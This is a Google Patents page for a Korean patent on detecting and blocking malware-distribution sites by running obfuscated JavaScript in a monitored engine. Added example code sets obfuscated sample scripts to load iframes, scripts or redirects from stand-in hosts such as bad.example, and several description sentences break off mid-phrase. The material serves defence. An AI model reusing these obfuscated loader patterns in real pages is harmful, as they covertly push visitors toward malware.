KR101577404B1 - System and method for blocking access malware by using monitoring java-script object and computer program for executing the method - Google Patents
- Publication number
- KR101577404B1 KR1020150114437A KR20150114437A
- Authority
- KR
- South Korea
- Prior art keywords
- javascript
- malicious code
- external link
- packet
- code
Classifications
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/14—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
- H04L63/1441—Countermeasures against malicious traffic
- H04L63/1466—Active attacks involving interception, injection, modification, spoofing of data unit addresses, e.g. hijacking, packet injection or TCP sequence number attacks
-
- G—PHYSICS
- G06—COMPUTING; CALCULATING OR COUNTING
- G06F—ELECTRIC DIGITAL DATA PROCESSING
- G06F21/00—Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
- G06F21/50—Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems
- G06F21/55—Detecting local intrusion or implementing counter-measures
- G06F21/56—Computer malware detection or handling, e.g. anti-virus arrangements
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/14—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
- H04L63/1408—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic by monitoring network traffic
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/30—Network architectures or network communication protocols for network security for supporting lawful interception, monitoring or retaining of communications or communication related information
- H04L63/306—Network architectures or network communication protocols for network security for supporting lawful interception, monitoring or retaining of communications or communication related information intercepting packet switched data communications, e.g. Web, Internet or IMS communications
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L2463/00—Additional details relating to network architectures or network communication protocols for network security covered by H04L63/00
- H04L2463/141—Denial of service attacks against endpoints in a network
Abstract
The present invention relates to a malicious code access blocking system, comprising: a malicious code DB including a malicious code distribution code list; a packet collection analyzing device for collecting and analyzing packets transmitted when a user terminal accesses the Internet; and a JavaScript analyzing unit for determining, when the packet includes obfuscated JavaScript, whether the obfuscated JavaScript is calling an external link, and determining whether the malicious code distribution code is inserted in the external link to be called.
Description
The present invention relates to a malicious code blocking technology, and more particularly, to a system and a method for blocking malicious code access using JavaScript object monitoring.
In recent years, damage to individuals and companies has been increasing due to leakage of personal information and corporate secrets. Such leakage of personal information and corporate secrets is caused by malicious code attacks that occur when individuals and companies use the Internet. Malicious code refers to software that is intentionally made to perform malicious activities, such as destroying the system or leaking information, against the will and interest of the user. These types of malicious code include hacking tools such as viruses, worms, Trojans, backdoors, logic bombs and trap doors, as well as malicious spyware and adware. The problems they cause, such as leakage of personal information like user IDs and passwords, control of the target system, deletion and alteration of files, system destruction, leakage of key data and installation of other hacking programs, are very diverse and serious.
In the past, malicious code developers have created malicious codes for the purpose of curiosity or self-disclosure, but recently, malicious codes have been produced to achieve financial benefits and political purposes. As a result, recent malicious codes are threatening Internet users because of the advanced, intelligent and automated attack and propagation technologies. As a result, the damage caused by malicious code has become widespread, and the number of malicious codes has increased exponentially over time. In addition, recent malicious codes may be able to bypass malicious code detection or interfere with and delay analysis of malicious code by incorporating various technologies.
In addition, hackers have recently turned the distribution of malicious code into a business, hacking homepages and using them to spread malicious programs. In an intentional attack, when a zero-day vulnerability is discovered (zero-day referring to the period between the discovery of a new vulnerability and the release of the software's security patch), hackers immediately create an attack tool and distribute malicious code. In an unintentional attack, hackers can distribute malicious code to users by causing content created by a partner company to be uploaded to the homepage with the malicious code already inserted.
Hackers who want to distribute malicious code use evasion techniques to effectively hide the malicious code on the hacked homepage. One example of such an evasion technique is preventing automated detection by JavaScript obfuscation of the malicious code distribution code. JavaScript obfuscation rewrites the script source code as encoded strings so that automated programs cannot find it and homepage managers have difficulty recognizing it. Examples of such JavaScript obfuscation include string encoding, crafted code encoding, and encoding using the JavaScript string escape function.
When malicious code is distributed through a homepage in this way, the terminals that visit it suffer damage from the distributed malicious program, such as leakage of personal information, leakage of corporate information, automatic e-mail sending or remote control of the terminal, and businesses suffer direct or indirect damage such as financial loss. In addition, not only the general users who visit the company homepage but also the terminals of employees inside the company are infected with the malicious code, so that customers' personal information and the company's internal information can be leaked.
Therefore, it is necessary to detect abuse of the protected company's web server as a route for malicious code, and to prevent infection with malicious code through visits to external websites.
Accordingly, it is an object of the present invention to provide a system and method for detecting a malicious code distribution code obfuscated with JavaScript and blocking malicious code distribution site access.
Accordingly, a malicious code access blocking system according to an embodiment of the present invention, which sits between a user terminal and the Internet and prevents the user terminal from accessing a malicious code distribution web site, comprises: a packet collection and analysis apparatus that collects and analyzes packets transmitted and received when the user terminal accesses the Internet; and a JavaScript analyzing apparatus that, if the packet includes obfuscated JavaScript, executes the obfuscated JavaScript and determines whether a malicious code distribution code is inserted into an external link called from the executed JavaScript. The JavaScript analyzing apparatus comprises: a JavaScript engine generating unit that generates a JavaScript engine that executes the obfuscated JavaScript; a JavaScript object generating unit that generates a JavaScript object in which the obfuscated JavaScript is executed; and a JavaScript object monitor generating unit that generates a JavaScript object monitor for determining, according to creation or modification of the JavaScript object, whether the malicious code distribution code is inserted into an external link called from the executed obfuscated JavaScript. The system further comprises an access blocking device that, when the malicious code distribution code is inserted into the external link, modifies the packet so that the external link cannot be connected and transmits the modified packet to the user terminal, thereby preventing the user terminal from accessing the external link.
The JavaScript object monitor includes: a JavaScript object detection module that detects creation or modification of the JavaScript object and, if creation or modification of the JavaScript object is detected, detects whether the external link is invoked; and a JavaScript object determination module that determines whether the malicious code distribution code is inserted in the external link when the external link is called.
The JavaScript object determination module searches the malicious code DB for the external link and, when the external link exists in the malicious code DB, requests the access blocking device to block access to the external link. When the external link does not exist in the malicious code DB, the module executes the external link through a plurality of virtual machines and checks its operation to judge whether there is a risk of malicious code infection; if it determines that there is such a risk, it requests the access blocking device to block the connection of the external link.
The access blocking device comprises: a packet copying unit for copying the collected packets; a malicious code distribution code collection management unit for additionally registering and managing the external link in the malicious code DB when it is determined that there is a risk of infecting the malicious code even though the external link does not exist in the malicious code DB; and a malicious code distribution code blocking unit for modifying the copied packet and transmitting the modified packet to the user terminal when a connection blocking request for the external link is received.
The packet collection and analysis apparatus comprises: a packet collection unit for collecting packets transmitted from the user terminal; and a packet analyzer for analyzing whether the collected packet includes content represented by JavaScript.
A method for blocking malicious code access according to an embodiment of the present invention, performed in a malicious code access blocking system that sits between a user terminal and the Internet and prevents the user terminal from accessing a malicious code distribution web site, includes: collecting packets transmitted and received when the user terminal accesses the Internet; analyzing whether the packet includes obfuscated JavaScript; if the packet includes obfuscated JavaScript, executing the obfuscated JavaScript and determining whether a malicious code distribution code is inserted in an external link called from the executed JavaScript; modifying the packet so that the external link cannot be connected when the malicious code distribution code is inserted in the external link; and transmitting the modified packet to the user terminal, thereby blocking the user terminal from accessing the external link. Analyzing whether the packet includes obfuscated JavaScript comprises: providing an environment for executing the obfuscated JavaScript; generating a JavaScript object in which the obfuscated JavaScript is executed; detecting creation or modification of the JavaScript object; and determining whether the malicious code distribution code is inserted in an external link called from the executed obfuscated JavaScript. The malicious code access blocking method comprises the steps of: collecting a packet transmitted when the user terminal accesses the Internet; analyzing whether the packet includes JavaScript; and determining whether a malicious code distribution code is inserted in an external link called by the JavaScript if the packet includes JavaScript.
The present invention also includes a computer program for executing the malicious code access blocking method.
With the existing technology, the accuracy of detecting and blocking malicious code is significantly reduced because the obfuscated JavaScript code in the html content of a homepage cannot be interpreted. According to an embodiment of the present invention, however, the obfuscated malicious code distribution code can be detected by copying, collecting and analyzing packets between a user terminal and the Internet, and access to the websites that distribute it can be blocked. In addition, because the present invention generates the JavaScript engine in the system's internal memory and executes the JavaScript there, it not only places no burden on the user's use of the system but also completely blocks the infection.
As a result, in the case of an individual, a user can prevent infection of a malicious code from a visited website in order to receive the service. In the case of enterprise, it can prevent infection from external malicious code distribution site visited in the organization. That is, an Internet user can receive a safe and pleasant Internet environment from malicious code.
In addition, when a new vulnerability is discovered through a zero-day attack, it takes a vaccine manufacturer an average of 3-5 weeks to patch its signatures (meaning the normalized patterns that intrusion detection and intrusion prevention systems and other information protection solutions use to detect and block hacking, vulnerabilities, viruses or harmful traffic). On the other hand, when the system according to an embodiment of the present invention is used, a zero-day attack can be coped with by detecting the URIs that distribute malicious code.
FIG. 1 is a view for explaining a malicious code access blocking system according to an embodiment of the present invention.
FIG. 2 is a view for explaining a JavaScript analysis apparatus according to an embodiment of the present invention.
FIG. 3 is a view for explaining an access blocking device according to an embodiment of the present invention.
FIG. 4 is a view for explaining a malicious code access blocking method according to an embodiment of the present invention.
FIGS. 5A through 5C illustrate functions of a JavaScript object monitor according to an exemplary embodiment of the present invention.
While the present invention has been described in connection with certain exemplary embodiments, it is to be understood that the invention is not limited to the disclosed embodiments, but, on the contrary, is intended to cover various modifications and similarities. It should be understood, however, that the invention is not intended to be limited to the particular embodiments, but includes all modifications, equivalents, and alternatives falling within the spirit and scope of the invention.
DETAILED DESCRIPTION OF THE PREFERRED EMBODIMENTS Hereinafter, the present invention will be described in detail with reference to the accompanying drawings.
Furthermore, the singular terms used in this specification and the claims should generally be construed to mean one or more unless otherwise stated.
FIG. 1 is a view for explaining a malicious code access blocking system according to an embodiment of the present invention.
There are many web pages on the Internet that contain code for distributing malicious code. However, since the user terminal does not know which web pages contain such code, it browses many web pages without any inspection. Therefore, merely by accessing a web page into which code for distributing malicious code has been inserted, the user terminal downloads the malicious code and is damaged.
The malicious code
The packet collection and
The packet collecting
The packet collecting
In addition, the
The
If the obfuscated JavaScript is included in the html content, the
The
Specifically, if the obfuscated JavaScript is included in the html content, the
If it is determined that the malicious code distribution code is inserted into the html content, the
The
The packet
FIG. 2 is a view for explaining a JavaScript analysis apparatus according to an embodiment of the present invention.
2, the
The JavaScript engine creation unit 210 creates the
The JavaScript object generating
When the JavaScript object is generated through the JavaScript
The JavaScript object
The JavaScript object monitor 240 includes a JavaScript
The JavaScript object monitor 240 can monitor the html content in real time from the packets being collected. In particular, the JavaScript object monitor 240 can monitor creation or modification of JavaScript objects in real time.
The JavaScript
For example, the JavaScript
If the src attribute exists, the JavaScript object determination module 242 determines whether the URI existing in the src attribute exists in the malicious code DB. The Uniform Resource Identifier (URI) is an identifier that identifies all the resources on the Internet. The existence of a URI is always attached to the Internet protocol as a basic condition required to use the Internet. The URI includes a URL (Uniform Resource Locator) and a URN (Uniform Resource Name).
If the URI exists in the malicious code DB, it is determined that the malicious code distribution code is inserted in the html content, and the JavaScript object determination module 242 transmits information on the html content to the access blocking device.
If the URI does not exist in the malicious code DB, the JavaScript object determination module 242 uses the virtual machine to dynamically analyze the inserted URI. To this end, the JavaScript object determination module 242 may execute one or more virtual machines to execute a plurality of URIs. The JavaScript object judging module 242 can judge which action is performed by visiting the URI using the program in the virtual machine. If the malicious code is downloaded, the JavaScript object determination module 242 transmits information about the URI and html contents to the access blocking device.
In addition, the JavaScript object determination module 242 can execute a URI extracted through a virtual machine to check whether a DBD (Drive By Downloads) occurs. If the DBD is generated, the JavaScript object determination module 242 determines that the malicious code distribution code is inserted, and transmits the URI and html content information to the access blocking device. Here, DBD is a malicious code that is downloaded and executed without the user's knowledge, by distributing malicious code to an unspecified number of users by using a known security vulnerability. A user accessing a web page by a DBD can be infected with malicious code.
At this time, the JavaScript object determination module 242 can determine whether the URI extracted in conjunction with the malicious code DB or one or more vaccines outside the system contains malicious code distribution code.
FIG. 3 is a view for explaining an access blocking device according to an embodiment of the present invention.
3, the
The
The malicious code distributed code
The malicious code distribution
FIG. 4 is a view for explaining a malicious code access blocking method according to an embodiment of the present invention.
Referring to FIG. 4, in step S400, the packet collecting unit collects packets from the user terminal. A packet is a set of data carrying the commands that appear in the process in which a client, which is a user terminal, requests communication with an HTTP or HTTPS server and the server responds to the client. Thereafter, the packet analyzer analyzes whether the collected packet includes JavaScript. In addition, the packet analyzing unit can parse the html content contained in the packet to analyze whether it contains obfuscated JavaScript.
If the html content includes obfuscated JavaScript, a JavaScript engine is created in step S405. The JavaScript engine is a program that runs obfuscated JavaScript and provides an environment in which JavaScript can be executed. Also, since the JavaScript engine is created in the internal memory of the malicious code access blocking system, it may not be affected by the user terminal or the external server.
In step S410, a JavaScript object is created. A JavaScript object is an object in which JavaScript can be executed, such as a JavaScript DOM or a JavaScript BOM. Because JavaScript is an object-based scripting language, a basic JavaScript object must exist in order to execute JavaScript code.
A JavaScript object monitor is created in step S415.
In step S420, the JavaScript object monitor monitors whether the JavaScript object is created or changed from the JavaScript being executed.
If the creation or modification of the JavaScript object is detected through the JavaScript object monitor, the JavaScript object detection module analyzes the html content generated from the executed obfuscated JavaScript in step S425. Then, the JavaScript object detection module detects whether external resources are invoked among the html contents.
If it is detected that the external resource is called, the JavaScript object determination module determines in step S430 whether the external resource to be called, that is, the URI exists in the malicious code DB.
If the URI exists in the malicious code DB, in step S435, the JavaScript object determination module requests the access blocking device to block the connection so that the user terminal can not use the html content.
If the URI does not exist in the malicious code DB, in step S440, the JavaScript object determination module can execute the URI using the virtual machine. The JavaScript Object Decision Module visits a URI using a program in the virtual machine and can analyze what it does.
In step S445, the JavaScript object determination module may determine whether a risk of malicious code infection occurs in the URI executed in the virtual machine. For example, a JavaScript object decision module can check if a DBD occurs when executing a URI.
If it is determined that there is a risk of malicious code infection, the JavaScript object monitor transmits URI and html content information to the access blocking device in step S450. Thereafter, the access blocking device additionally registers the URI in the malicious code DB and blocks the user terminal from accessing the URI.
FIGS. 5A through 5C illustrate functions of a JavaScript object monitor according to an exemplary embodiment of the present invention.
FIG. 5A is a diagram illustrating an example in which a JavaScript object monitor detects a change in an external link in a state where a JavaScript DOM is generated.
If the html document as shown in FIG. 5A is included in the packet and is transmitted from the user terminal, the malicious code access blocking system collects the html document through the packet collection and analysis apparatus. If it is determined that the html document contains obfuscated JavaScript, the packet acquisition and analysis device requests analysis of the obfuscated JavaScript with the JavaScript analysis device. The JavaScript parser then generates the JavaScript engine and JavaScript DOM. The JavaScript Object Monitor detects the creation of a JavaScript DOM and determines if there is a risk of malware infection.
Specifically, in step S500, the JavaScript object detection module detects that http://www.w3schools.com (hereinafter, the first URI) is invoked using the src attribute. Accordingly, the JavaScript object determination module can determine whether the first URI is a URI existing in the malicious code DB.
In addition, in step S510, the JavaScript object detection module may detect that the src attribute calls the external link http://www.malware.com/mal.html (hereinafter, the second URI). That is, when step S510 is performed, the JavaScript object detection module may detect that the first URI called in step S500 is changed to the second URI. Accordingly, the JavaScript object determination module can determine whether the second URI exists in the malicious code DB.
Thereafter, if the first URI or the second URI is included in the malicious code DB, or is not included in the malicious code DB but is determined to carry a risk of malicious code infection, the access blocking device blocks the user terminal from accessing the URI.
FIG. 5B is a view for explaining an example in which a JavaScript object monitor performs an external link detection of a src attribute in a state where a JavaScript DOM is generated. The same points as those in FIG. 5A will be omitted and differences will be mainly described.
The JavaScript analysis apparatus can perform step S520 by generating a JavaScript engine and a JavaScript DOM. The JavaScript object monitor can detect that the JavaScript script Iframe tag is generated by performing the step S520 while detecting the creation of the JavaScript DOM. In particular, the JavaScript object detection module can detect the creation of the src attribute in the generated tag. If the creation of the src attribute is detected, the JavaScript object decision module can determine if the URI that the src attribute invokes is inserting code that propagates the malicious code.
FIG. 5C is a view for explaining an example in which a JavaScript object monitor performs an external link detection of a location attribute in a state where a JavaScript BOM is generated. The same points as those in FIG. 5A will be omitted and differences will be mainly described.
The JavaScript object monitor can detect the creation or modification of a JavaScript BOM. Accordingly, the JavaScript object monitor can detect the change of the location property by performing the step S530 while detecting the change of the JavaScript BOM. If a change in the location attribute is detected, the JavaScript object decision module can determine if the URI that the location attribute invokes is inserting code that propagates the malicious code.
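The three cases of FIGS. 5A to 5C can be reproduced with a small monitor, added here as an illustration and not taken from the patent: stub DOM and BOM objects report every write to src or location while obfuscated script runs in a Node.js vm context, and each observed URI is checked against a constructed blocklist. The names analyzeScript, createMonitoredObjects and MALICIOUS_DB and the sample scripts are assumptions of this example.

```javascript
const vm = require('node:vm');

// Constructed stand-in for the patent's malicious code DB (a URI blocklist).
const SAMPLE_URI = 'http://www.malware.com/mal.html';
const MALICIOUS_DB = new Set([SAMPLE_URI]);

// Stub DOM/BOM objects whose external-link properties report every write.
function createMonitoredObjects() {
  const events = [];
  const record = (kind, target, uri) =>
    events.push({ kind, target, uri: String(uri) });

  function makeElement(tag) {
    const el = { tagName: String(tag).toUpperCase(), children: [] };
    let src = '';
    Object.defineProperty(el, 'src', {
      get: () => src,
      set: (v) => { src = String(v); record('src', el.tagName, src); },
    });
    el.setAttribute = (name, value) => {
      if (String(name).toLowerCase() === 'src') el.src = value;
    };
    el.appendChild = (child) => { el.children.push(child); return child; };
    return el;
  }

  // BOM side: every navigation route funnels into one recorder.
  let href = 'about:blank';
  const navigate = (v) => { href = String(v); record('location', 'BOM', href); };
  const location = { assign: navigate, replace: navigate };
  Object.defineProperty(location, 'href', { get: () => href, set: navigate });

  const byId = new Map(); // elements handed out by getElementById
  const document = {
    body: makeElement('body'),
    createElement: makeElement,
    getElementById(id) {
      if (!byId.has(id)) byId.set(id, makeElement('iframe'));
      return byId.get(id);
    },
    // HTML emitted at run time is scanned for src attributes (step S425).
    write(html) {
      const re = /<(\w+)[^>]*?\ssrc\s*=\s*["']?([^"'\s>]+)/gi;
      for (const m of String(html).matchAll(re)) {
        record('src', m[1].toUpperCase(), m[2]);
      }
    },
  };
  const linkProp = { get: () => location, set: navigate };
  Object.defineProperty(document, 'location', linkProp);
  const window = { document };
  Object.defineProperty(window, 'location', linkProp);

  return { events, sandbox: { window, document, location } };
}

// Runs the script and sorts observed URIs as in steps S430 to S440.
// node:vm separates globals only and is not a security boundary; real
// samples belong in a disposable VM, as the patent's dynamic analysis does.
function analyzeScript(source, db = MALICIOUS_DB) {
  const { events, sandbox } = createMonitoredObjects();
  let error = null;
  try {
    vm.runInContext(source, vm.createContext(sandbox), { timeout: 500 });
  } catch (e) {
    error = String(e && e.message); // keep what was seen before the failure
  }
  // A bare `location = "..."` overwrites the global instead of hitting a setter.
  if (typeof sandbox.location === 'string') {
    events.push({ kind: 'location', target: 'BOM', uri: sandbox.location });
  }
  const uris = [...new Set(events.map((e) => e.uri))];
  return {
    events,
    blocked: uris.filter((u) => db.has(u)),
    needsDynamicAnalysis: uris.filter((u) => !db.has(u)),
    error,
  };
}

// Constructed samples; the URIs are the ones used in FIG. 5A of the text.
const pct = (s) => Array.from(s, (c) =>
  '%' + c.charCodeAt(0).toString(16).padStart(2, '0')).join('');
const SAMPLE_5A = `
  var f = document.getElementById("frame");
  f.src = "http://www.w3schools.com";
  f.src = unescape("${pct(SAMPLE_URI)}");`;
const SAMPLE_5B = `
  var codes = [${Array.from(SAMPLE_URI, (c) => c.charCodeAt(0))}];
  var el = document.createElement("iframe");
  el.setAttribute("src", String.fromCharCode.apply(null, codes));
  document.body.appendChild(el);`;
const SAMPLE_5C = `window["loc" + "ation"] = unescape("${pct(SAMPLE_URI)}");`;

for (const [name, src] of [['5A', SAMPLE_5A], ['5B', SAMPLE_5B], ['5C', SAMPLE_5C]]) {
  const r = analyzeScript(src);
  console.log(name, r.events.map((e) => `${e.kind}:${e.uri}`), 'blocked:', r.blocked);
}
```

URIs returned in `needsDynamicAnalysis` correspond to the branch that the text sends to virtual-machine analysis (steps S440 and S445), which this example does not implement.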
The apparatus and method according to the above-described embodiments of the present invention may be implemented in the form of program instructions that can be executed through various computer means and recorded in a computer-readable medium. The computer readable medium may include program instructions, data files, data structures, and the like, alone or in combination.
Program instructions to be recorded on a computer-readable medium may be those specially designed and constructed for the present invention or may be available to those skilled in the computer software arts. Examples of computer-readable media include magnetic media such as hard disks, floppy disks and magnetic tape; optical media such as CD-ROMs and DVDs; magneto-optical media; and hardware devices specifically configured to store and execute program instructions, such as ROM, RAM, flash memory, and the like. Examples of program instructions include machine language code such as those produced by a compiler, as well as high-level language code that can be executed by a computer using an interpreter or the like.
The hardware devices described above may be configured to operate as one or more software modules to perform the operations of the present invention, and vice versa.
The present invention has been described with reference to the preferred embodiments. It will be understood by those skilled in the art that various changes in form and details may be made therein without departing from the spirit and scope of the invention as defined by the appended claims. Therefore, the disclosed embodiments should be considered in an illustrative rather than a restrictive sense. The scope of the present invention is defined by the appended claims rather than by the foregoing description, and all differences within the scope of equivalents thereof should be construed as being included in the present invention.
100: malicious code access blocking system
110: Packet collection analyzer
120: JavaScript analysis device
130:
140: Malicious Code DB
Claims (14)
A packet collection and analysis apparatus for collecting and analyzing packets transmitted and received when a user terminal accesses the Internet; And
And a JavaScript analyzer for, if the packet includes obfuscated JavaScript, executing the obfuscated JavaScript and determining whether a malicious code distribution code is inserted in an external link called from the executed JavaScript,
The JavaScript analysis device
A JavaScript engine generating unit for generating a JavaScript engine for executing the obfuscated JavaScript;
A JavaScript object generation unit for generating a JavaScript object in which the obfuscated JavaScript is executed; And
And a JavaScript object monitor generating unit for generating a JavaScript object monitor for determining whether a malicious code distribution code is inserted into an external link called from the executed obfuscated JavaScript according to creation or modification of the JavaScript object,
And an access blocking device which, when the malicious code distribution code is inserted in the external link, modifies the packet so that the external link cannot be connected and transmits the modified packet to the user terminal, thereby blocking the user terminal from accessing the external link.
Wherein the JavaScript object monitor comprises:
A JavaScript object detection module that detects creation or modification of the JavaScript object and detects whether an external link is invoked if generation or modification of the JavaScript object is detected; And
And a JavaScript object determination module for determining whether the external link is inserting the malicious code distribution code when the external link is called.
Wherein the JavaScript object determination module comprises:
Searches the malicious code DB for the external link,
If the external link is present in the malicious code DB, requesting the connection blocking device to block the connection of the external link,
If the external link does not exist in the malicious code DB, the external link is executed through a plurality of virtual machines to check the operation to determine whether the malicious code is infected. If it is determined that there is a risk of infection of the malicious code And requests the connection blocking device to block the connection of the external link.
The connection blocking device
A packet copying unit for copying the collected packets;
A malicious code distributed code collection management unit for additionally registering and managing the external link in the malicious code DB when it is determined that there is a risk of infecting the malicious code even though the external link does not exist in the malicious code DB; And
And transmitting the modified packet to the user terminal when the connection blocking request is received from the external link.
The packet collection and analysis apparatus
A packet collector for collecting packets transmitted from the user terminal; And
And a packet analyzer for analyzing whether the collected packet includes content represented by JavaScript.
Collecting packets transmitted and received when the user terminal accesses the Internet;
Analyzing whether the packet includes obfuscated JavaScript;
If the packet includes obfuscated JavaScript, determining whether a malicious code distribution code is inserted in an external link called from the executed JavaScript by executing the obfuscated JavaScript;
Modifying the packet so that it cannot connect to the external link when the malicious code distribution code is inserted in the external link; and
Transmitting the modified packet to the user terminal, and blocking the user terminal from accessing the external link,
The step of analyzing whether the packet includes obfuscated JavaScript
Providing an environment for executing the obfuscated JavaScript;
Generating a JavaScript object in which the obfuscated JavaScript is executed;
Detecting creation or modification of the JavaScript object; And
and determining whether the malicious code distribution code is inserted in an external link called from the executed obfuscated JavaScript.
Wherein the step of determining whether the external link inserts the malicious code-
Comparing the external link with a malicious code database;
Blocking the connection of the external link when the external link exists in the malicious code DB;
Executing a plurality of virtual machines when the external link is not present in the malicious code DB;
Executing the external link in the virtual machine to confirm the operation; And
And blocking the connection of the external link when the operation has a risk of infecting the malicious code.
Wherein the step of interrupting the connection of the external link comprises:
Copying the collected packets;
And modifying the copied packet and transmitting the modified packet to the user terminal.
Further comprising registering the external link in the malicious code DB when it is determined that there is a risk of infecting the malicious code even though the external link does not exist in the malicious code DB.
A computer program recorded on a computer-readable recording medium for executing the malicious code access blocking method.
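The monitoring and determination steps in the claims above, as an added JavaScript (Node.js) example that is not code from the patent: it runs a constructed obfuscated script against a stub `document`, records each external link the script's objects are given, and applies the DB lookup before deferring unknown hosts to virtual-machine analysis. The names `analyze`, `makeEnv`, `MALWARE_DB` and `PAGE`, and the `.example` and `.invalid` hosts, are assumptions.

```javascript
const vm = require('node:vm');

// Constructed stand-in for the claims' "malicious code DB" (hostnames only).
const MALWARE_DB = new Set(['bad.example']);
const PAGE = 'http://page.invalid/'; // hypothetical URL of the page under analysis

// Stub DOM: every object handed to the script reports the links it is given.
function makeEnv(links) {
  const record = (how, url) => links.push({ how, url: String(url) });
  const createElement = (tag) => new Proxy({ tagName: String(tag).toUpperCase() }, {
    set(target, prop, value) {
      if (prop === 'src' || prop === 'href') record(`${tag}.${prop}`, value);
      target[prop] = value;
      return true;
    },
  });
  const write = (html) => {
    const attr = /(?:src|href)\s*=\s*["']?([^"'\s>]+)/gi;
    for (const m of String(html).matchAll(attr)) record('document.write', m[1]);
  };
  return { document: { createElement, write, body: { appendChild: (el) => el } } };
}

// Resolve a recorded link against the page; unparsable values yield ''.
function hostOf(url) {
  try { return new URL(url, PAGE).hostname; } catch (err) { return ''; }
}

// Run the script, then classify each link as the determination module would.
function analyze(script) {
  const links = [];
  try {
    // node:vm is not a security boundary; run real samples in a disposable VM.
    vm.runInContext(script, vm.createContext(makeEnv(links)), { timeout: 500 });
  } catch (err) { /* links recorded before a throw or timeout are kept */ }
  return links.map((link) => {
    const host = hostOf(link.url);
    let verdict = 'sandbox'; // not in the DB: hand over to VM analysis
    if (host === 'page.invalid') verdict = 'same-site';
    else if (MALWARE_DB.has(host)) verdict = 'block';
    return { ...link, host, verdict };
  });
}

// Constructed sample: the script URL is hidden as character codes.
const SAMPLE = `
var c = [104,116,116,112,58,47,47,98,97,100,46,101,120,97,109,112,108,101,47,120,46,106,115];
var s = document.createElement('script');
s.src = String.fromCharCode.apply(null, c);
document.body.appendChild(s);
document.write('<iframe src="http://cdn.example/ad.html" width=0 height=0></iframe>');
`;
```

`analyze(SAMPLE)` returns one record per link with its decoded URL, host and verdict.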
Priority Applications (1)
Application Number | Priority Date | Filing Date | Title |
---|---|---|---|
KR1020150114437A KR101577404B1 (en) | 2015-08-13 | 2015-08-13 | System and method for blocking access malware by using monitoring java-script object and computer program for executing the method |
Publications (1)
Publication Number | Publication Date |
---|---|
KR101577404B1 (en) | 2015-12-28 |
Family
ID=55084985
Family Applications (1)
Application Number | Title | Priority Date | Filing Date |
---|---|---|---|
KR1020150114437A KR101577404B1 (en) | 2015-08-13 | 2015-08-13 | System and method for blocking access malware by using monitoring java-script object and computer program for executing the method |
Country Status (1)
Country | Link |
---|---|
KR (1) | KR101577404B1 (en) |
Cited By (1)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
WO2019027106A1 (en) * | 2017-08-01 | 2019-02-07 | 주식회사 에프원시큐리티 | System for analyzing degree of risk for malicious code distribution site by using machine learning |
Citations (3)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
KR20100123368A (en) * | 2009-05-15 | 2010-11-24 | 인포뱅크 주식회사 | System and method for analyzing malicious code |
KR101200906B1 (en) * | 2011-04-27 | 2012-11-13 | (주)소만사 | High Performance System and Method for Blocking Harmful Sites Access on the basis of Network |
KR101514984B1 (en) * | 2014-03-03 | 2015-04-24 | (주)엠씨알시스템 | Detecting system for detecting Homepage spreading Virus and Detecting method thereof |
- 2015-08-13 KR KR1020150114437A patent/KR101577404B1/en active IP Right Grant
Similar Documents
Publication | Publication Date | Title |
---|---|---|
US10956566B2 (en) | Multi-point causality tracking in cyber incident reasoning | |
US10592676B2 (en) | Application security service | |
US10447730B2 (en) | Detection of SQL injection attacks | |
US11941054B2 (en) | Iterative constraint solving in abstract graph matching for cyber incident reasoning | |
Egele et al. | Defending browsers against drive-by downloads: Mitigating heap-spraying code injection attacks | |
KR101514984B1 (en) | Detecting system for detecting Homepage spreading Virus and Detecting method thereof | |
US11184374B2 (en) | Endpoint inter-process activity extraction and pattern matching | |
US9092823B2 (en) | Internet fraud prevention | |
US20090064337A1 (en) | Method and apparatus for preventing web page attacks | |
KR101080953B1 (en) | System and method for detecting and protecting webshell in real-time | |
WO2009032765A2 (en) | Proxy engine for custom handling of web content | |
WO2017056121A1 (en) | Method for the identification and prevention of client-side web attacks | |
US20160134658A1 (en) | Unauthorized access detecting system and unauthorized access detecting method | |
JP6450022B2 (en) | Analysis device, analysis method, and analysis program | |
JP5752642B2 (en) | Monitoring device and monitoring method | |
KR101487476B1 (en) | Method and apparatus to detect malicious domain | |
KR100961149B1 (en) | Method for detecting malicious site, method for gathering information of malicious site, apparatus, system, and recording medium having computer program recorded | |
TWI470468B (en) | System and method for detecting web malicious programs and behaviors | |
JP5656266B2 (en) | Blacklist extraction apparatus, extraction method and extraction program | |
KR101372906B1 (en) | Method and system to prevent malware code | |
CN108040036A (en) | A kind of industry cloud Webshell safety protecting methods | |
KR20080036706A (en) | Web security module using regulation expression of web attack and include function of script language | |
KR101754195B1 (en) | Method for security enhancement based on multi log gathering server | |
KR20120070025A (en) | Web / email for distributing malicious code through the automatic control system and how to manage them | |
KR101577404B1 (en) | System and method for blocking access malware by using monitoring java-script object and computer program for executing the method |
Legal Events
Date | Code | Title | Description |
---|---|---|---|
E701 | Decision to grant or registration of patent right | ||
GRNT | Written decision to grant | ||
FPAY | Annual fee payment | Payment date: 20181206 Year of fee payment: 4 |